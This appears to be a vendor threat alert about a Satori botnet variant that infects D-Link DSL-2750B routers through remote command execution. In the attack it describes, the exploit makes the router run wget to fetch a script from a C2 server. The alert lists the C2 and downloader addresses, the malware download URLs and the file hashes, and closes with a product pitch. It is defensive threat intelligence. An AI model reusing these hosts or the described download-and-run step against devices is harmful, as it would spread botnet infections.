Satori IoT Botnet Variant


On June 15, Radware’s deception network detected an upsurge of malicious activity scanning and infecting a variety of IoT devices to take advantage of recently discovered device exploits.

Download A Copy Now

Abstract

On June 15, Radware’s deception network detected an upsurge of malicious activity scanning and infecting a variety of IoT devices to take advantage of recently discovered device exploits. The payload, previously unseen, is deliv-ered by the infamous Satori botnet, this time leveraging a worm style propagation manner. Radware observed an exponential increase in the number of attack sources spread all over the world and peaking at over 2500 attackers in a 24-hour period.


Figure 1: D-Link exploitation attempts

Satori is a Mirai-based botnet, first discovered by security researches from Qihoo 360 Netlab, who also provided an in-depth analysis of this new Satori Variant in their June 15th post. The new variant is infecting D-Link DSL-2750B rout-ers as well as scanning for vulnerable XionMai uc-httpd 1.0.0 devices, which has caused a surge in port scanning activities (ports 80, 8000, 8080). This Satori variant also carries DDoS capabilities and has been reported to launch several DDoS attacks.

Background

Radware’s Threat Research team witnessed thousands of IPs trying to infect our honeypots at a high rate, using a previously unseen payload.


Figure 2: Distribution of infections by country


Figure 3: Exponential increase in attack sources on June 16

Attack Methods

This attack exploits an RCE (Remote Code Execution) vulnerability of the D-Link DSL-2750B router, causing it to launch a wget command for downloading a remote script hosted on a web server at 185.62.190.191.


Figure 4: Downloading a remote script from the C2


Figure 5: Content of the download script hosted at hxxp://185.62.190.191/r


Figure 6: Full exploit body, including the 'Hello world' User-Agent

At the time of writing, no CVE exists for this D-Link vulnerability even though it was disclosed over two years ago (see table below).

2018-06-08

https://www.exploit-db.com/exploits/44864/

XiongMai uc-httpd 1.0.0 - Buffer Overflow
CVE-2018-10088

2018-05-25

https://www.exploit-db.com/exploits/44760/

Metasploit module - D-Link DSL-2750B OS Command Injection

2017-01-21

http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/

D-LINK ROUTER DSL-2750B FIRMWARE 1.01 TO 1.03 – RCE NO AUTH

2016-02-05

http://seclists.org/fulldisclosure/2016/Feb/53

D-Link router DSL-2750B firmware 1.01 to 1.03 - remote command execution no auth required

 

Denial of Service

As Satori originated from the Mirai botnet, it features some of its original attack libraries and includes the following vectors, each that can be triggered at infected IoT devices simultaneously.

  • UDP Flood
  • SYN Flood
  • TCP_ACK Flood
  • GRE Flood

During the time of writing this document, the original download server (185.62.190.191) was taken down. After less than a day, new variants started to hit our honeypots, downloading updated binaries from 95.215.62.169 - the same server used as Satori C2. We have reported and uploaded the binaries.


Figure 7: VirusTotal detection of new Satori variants


Figure 8: Content of new download script hosted at hxxp://95.215.62.169/r

IOCs / Hashes

IOCs / Hashes

 

 

185.62.190.191

Satori Downloader 

* Currently not accessible

180.101.204.161

Satori Report server

 

r.rippr.cc        

Satori Reporter listed in this host's DNS TXT record 

* Currently not accessible

95.215.62.169:5600

Satori C2 

June 19 update : * Currently also used as download server

i.rippr.cc          

Satori C2 listed in this host's DNS TXT record 

* Currently not accessible

e4bd8dd1f44a81f27b8a7ef458345e18

http://95.215.62.169/arm.bot.le

Last-Modified: Tue, 19 Jun 2018 10:17:44 GMT

08eedfc7576a1373375c1844cd7022d3

http://95.215.62.169/mips.bot.be

Last-Modified: Tue, 19 Jun 2018 10:17:52 GMT

a1497029e35abe90409b52ef4bd984e0

http://95.215.62.169/mipsel.bot.le

Last-Modified: Tue, 19 Jun 2018 10:17:52 GMT

974ecf6c95ee99da6ce3ee8a1492b2e4

http://95.215.62.169/arm7.bot.le

Last-Modified: Tue, 19 Jun 2018 10:17:46 GMT

f6568772b36064f3bb58ac3aec09d30e

http://123.207.251.95:80/bins/arm 

Last-Modified: Wed, 13 Jun 2018 22:57:01 GMT

f6568772b36064f3bb58ac3aec09d30e

http://123.207.251.95:80/bins/arm7 

Last-Modified: Wed, 13 Jun 2018 22:56:44 GMT

99f13d801c40f23b19a07c6c77402095

http://123.207.251.95:80/bins/mpsl 

Last-Modified: Wed, 13 Jun 2018 22:57:27 GMT

e337d9c99bfe2feef8949f6563c57062

http://123.207.251.95:80/bins/arm7 

Last-Modified: Wed, 13 Jun 2018 22:56:44 GMT

f8d1d92e9b74445f2a0d7f1feb78d639

http://123.207.251.95:80/bins/arm 

Last-Modified: Wed, 13 Jun 2018 22:57:01 GMT

e337d9c99bfe2feef8949f6563c57062

http://185.62.190.191/arm7.bot.le 

* Currently not accessible

99f13d801c40f23b19a07c6c77402095

http://185.62.190.191/mipsel.bot.le 

* Currently not accessible

f6568772b36064f3bb58ac3aec09d30e

http://185.62.190.191/arm.bot.le 

* Currently not accessible

f8d1d92e9b74445f2a0d7f1feb78d639

http://185.62.190.191/arm.bot.le 

* Currently not accessible

656f4a61cf29f3af54affde4fccb5fd0

http://185.62.190.191/x86_64.bot.le 

* Currently not accessible

31a40e95b605a93f702e4aa0092380b9

http://185.62.190.191/i686.bot.le 

* Currently not accessible

426f8281d6599c9489057af1678ce468

http://185.62.190.191/arm7.bot.le 

* Currently not accessible

44133462bd9653da097220157b1c0c61

http://185.62.190.191/arm.bot.le 

* Currently not accessible

476cd802889049e3d492b8fb7c5d09ed

http://185.62.190.191/mipsel.bot.le 

* Currently not accessible

bdf1a0ec31f130e959adafffb6014cce

http://185.62.190.191/x86_64.bot.le 

* Currently not accessible

e193a58b317a7b44622efe57508eecc4

http://185.62.190.191/r 

* Currently not accessible

Mitigation Recommendations

Only a threat intelligence service that monitors active threats and can provide actionable information in real time. Radware’s ERT Active Attackers Feed automatically correlates and qualifies discoveries based on information from Radware’s global detection network and feeds Radware’s application and network security devices with this intelligence for automated blocking of the known attackers. In addition, the Security Update Service (SUS) makes sure customers will have signature to such known vulnerabilities.

Radware Customers: If you are subscribed to our Active Attackers Feed or SUS, you are protected.

Effective DDoS Protection Essentials

  • Hybrid DDoS Protection - On-premise and cloud DDoS protection for real-time DDoS attack prevention that also addresses high volume attacks and protects from pipe saturation
  • Behavioral-Based Detection - Quickly and accurately identify and block anomalies while allowing legitimate traffic through
  • Real-Time Signature Creation - Promptly protect from unknown threats and zero-day attacks
  • A Cyber-Security Emergency Response Plan - A dedicated emergency team of experts who have experience with Internet of Things security and handling IoT outbreaks
  • Intelligence on Active Threat Actors – high fidelity, correlated and analyzed date for preemptive protection against currently active known attackers.

For further network and application protection measures, Radware urges companies to inspect and patch their network in order to defend against risks and threats.

Under Attack and in Need of Expert Emergency Assistance? Radware Can Help

Radware offers a service to help respond to security emergencies, neutralize the risk and better safeguard operations before irreparable damages occur. If you’re under DDoS attack or malware outbreak and in need of emergency assistance, contact us with the code "Red Button."


Click here to download the ERT Threat Alert. Download Now